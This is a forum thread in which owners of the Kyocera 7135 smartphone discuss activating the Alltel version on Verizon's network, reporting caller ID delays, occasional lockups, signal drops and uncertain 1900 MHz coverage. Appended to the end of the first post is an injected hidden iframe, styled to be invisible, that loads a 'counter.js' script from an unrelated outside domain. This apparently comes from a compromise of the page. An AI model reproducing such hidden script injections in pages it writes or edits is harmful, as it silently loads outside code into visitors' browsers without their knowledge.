+ Reply to Thread
Page 1 of 2 1 2 LastLast

Problems w Alltell 7135 on Verizon Network?

I have been reading the posts in this forum for several weeks, but haven't posted many of my own messages since I haven't gotten a 7135 yet. I am among the group currently waiting for Verizon to come out with it.

However, I don't see any threads or posts about problems with the Alltell 7135 obtained through getconnected when it is activated on the Verizon network.

Does anyone have any problems? Notice anything that doesn't work fully? Are there any concerns over things that you won't be able to do once the verizon version is up and running?

Obviously we don't know what the hold up is with Verizon, but if there are problems that they are working on correcting will that affect those with AllTel versions?

Finally, I have seen people mention that after Verizon gets the phone they will have them "flash" it. Two questions, first will that fix any problems that Verizon is doing testing for now? Second, would that wipe out all of your data and programs?

I leaning towards pulling the trigger and getting the Alltel version unless I'll end up stuck with a $600 paperweight in 6 months.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Problems w Alltell 7135 on Verizon Network?

Originally posted by AustinKirk
    I have been reading the posts in this forum for several weeks, but haven't posted many of my own messages since I haven't gotten a 7135 yet. I am among the group currently waiting for Verizon to come out with it.

However, I don't see any threads or posts about problems with the Alltell 7135 obtained through getconnected when it is activated on the Verizon network.

Does anyone have any problems? Notice anything that doesn't work fully? Are there any concerns over things that you won't be able to do once the verizon version is up and running?

Obviously we don't know what the hold up is with Verizon, but if there are problems that they are working on correcting will that affect those with AllTel versions?

Finally, I have seen people mention that after Verizon gets the phone they will have them "flash" it. Two questions, first will that fix any problems that Verizon is doing testing for now? Second, would that wipe out all of your data and programs?

I leaning towards pulling the trigger and getting the Alltel version unless I'll end up stuck with a $600 paperweight in 6 months.
    A few people have noticed a problem with delayed caller ID. It is not consistant across all users, so we haven't determined if it is one of the issues Verizon is holding up the release for or not. A few other quirks have been identified, but nothing that I consider too serious. If I lived and died by my phone, I might have waited, since one of the quirks is occasional lockups.

We don't know yet whether problems Verizon is dealing with will be flash fixable or not. If they are, then flash should not wipe out your data, but even if it does, when you hotsync, you automatically make a backup on your computer and can easily restore your data, and if you get an SD or MMC card, you can use the BackUpBuddy VFS (free version sort of comes with the phone... there is a link on the CD to download it) and restore your data within minutes....

Alan

The phone is awesome. I have used it on Verizon since 12/26 and have not seen any issues. It is way better than my 6035 that was approved by Verizon. Caller ID works fine with over 8000 contacts!!!!!!!

Buy one and enjoy!

Re: Problems w Alltell 7135 on Verizon Network?

Austin:

Originally posted by AustinKirk
    As I've reported here, I HAVE experienced FROM TIME TO TIME instances where either a) service is completely lost (proven because another VZW phone will have signal at the same time) ... or b) while stationary, signal changes from Digital to Analog (as a result, larger charges if on Analog).

However, I found that forcing a PHONE reset clears it up.

mine is working great

I am just tired of waiting for Verizon. So last week I bought online, since there is no alltel service here.

I received the phone on Friday, called up Verizon support right away, gave the ESD number, and told him it's a 7135, and got activated in a few minutes.

Works great so far.

I love mine, and the signal is better than with my old StarTac. My two challenges are getting voicemail to register in the "Messages" and sending email (as discussed in another thread)--both of which I expect to be fixable with a little fiddling.

Take the plunge!!

All is GREAT for me with this phone. I'm loving the features that I discover every single day. It is like using Datebk5 -- lots of features are not documented (or I couldn't find them).

I am very satisfied with mine... I have travled to Wisconsin (constant analog areas) and to Chicago (super fast data connection)... Everything so far, so good... My only, only issue, and I noticed this with my 6035 when I bought it when it first came out.... Periodically, I am doing a soft reset when it looks up...

Otherwise awesome... go get one...

Originally posted by dgelfuso
    Caller ID works fine with over 8000 contacts!!!!!!!
    Jeebus... 8000 contacts?!? ...and I thought I was pushing the limits of the 7135 with 500+ contacts. It's amazing the 7135 query that much data so quickly. How much of a delay do you notice when as it looks through all that info for caller ID match?

http://mikewren.com

95% of the time the name is up by the second ring. Plenty fast for me!

Originally posted by dgelfuso
    95% of the time the name is up by the second ring. Plenty fast for me!
    your 7135 is a pre-release or a Getconnected 7135 ?

audio_*****
    Audio_***** :)
    6035-7135-Treo 650

I will be getting my 7135 tomorrow finally I have noticed with my 6035 the caller id takes one ring to either show the number in my contacts or the number that is calling me. If this is one of the reasons Verizon is holding up the release of the phone it'sone I can live with until a fix comes out. I dont think I will sleep tonight and when i see the UPS guy I might just give her a hug.
    Thomas

6035 Kyocera Smartphone

7135 Kyocera Smartphone

Ok. I have a question. Do any of the existing 7135 user's experience any problems in a pcs market? Now before you can answere this you need to know what digital freqency your area of the country uses with VZW ie 800mgtz or 1900 mghtz(pcs)

VA North to Maine is all 800. Florida and So Cal are mainly 1900. Anybody using the phone in these area? Any digital connnection problems?

Reason why I ask is that I heard from a bird that the 1900 frequency was having issues (which would be a very big problem for Sprint).

The other software issue I heard it was having was with the GPS chip wich would could very easily be a flash update since gps 911 services arent' up yet anyway.

And in general if anyone discovers any other glitches please note them here.

Originally posted by semm71
    Ok. Reason why I ask is that I heard from a bird that the 1900 frequency was having issues (which would be a very big problem for Sprint).
    Can anyone with the 7135 tell whether this is a problem. I am ready to buy, but this is the only rumour of a problem that really bothers me at this point. I travel and need to know the phone will work around the country on VZW, including Florida and So. Cal.

Originally posted by HITOWER
    ...when i see the UPS guy I might just give her a hug.
    ~'kito
    pdaPhoneHome Moderator

I do not know what it is in Atlanta, but, I works fine here!!

Mark

Originally posted by Markito
    Sorry about the confusion. We have a lady UPS person. I automaticly threw in GUY its a male thing sorry. Hope this clears it up. I will still give her a hug.
    Thomas

6035 Kyocera Smartphone

7135 Kyocera Smartphone

~'kito
    pdaPhoneHome Moderator

1900 market

In regards to operating the phone at 1900 megs, in California Verizon is all 800. I have had a 7135 since mid december, traveled all over the state and had 0 problems with reception, call quality, service rocks, data and voice.

For in put on a 1900 market, you need to find out where verizon is operating in the pcs band. A start would be former primeco markets, many of which are now verizon. As I recall So florida, and parts of texas are likely verizon 1900 - any users in those areas?

eric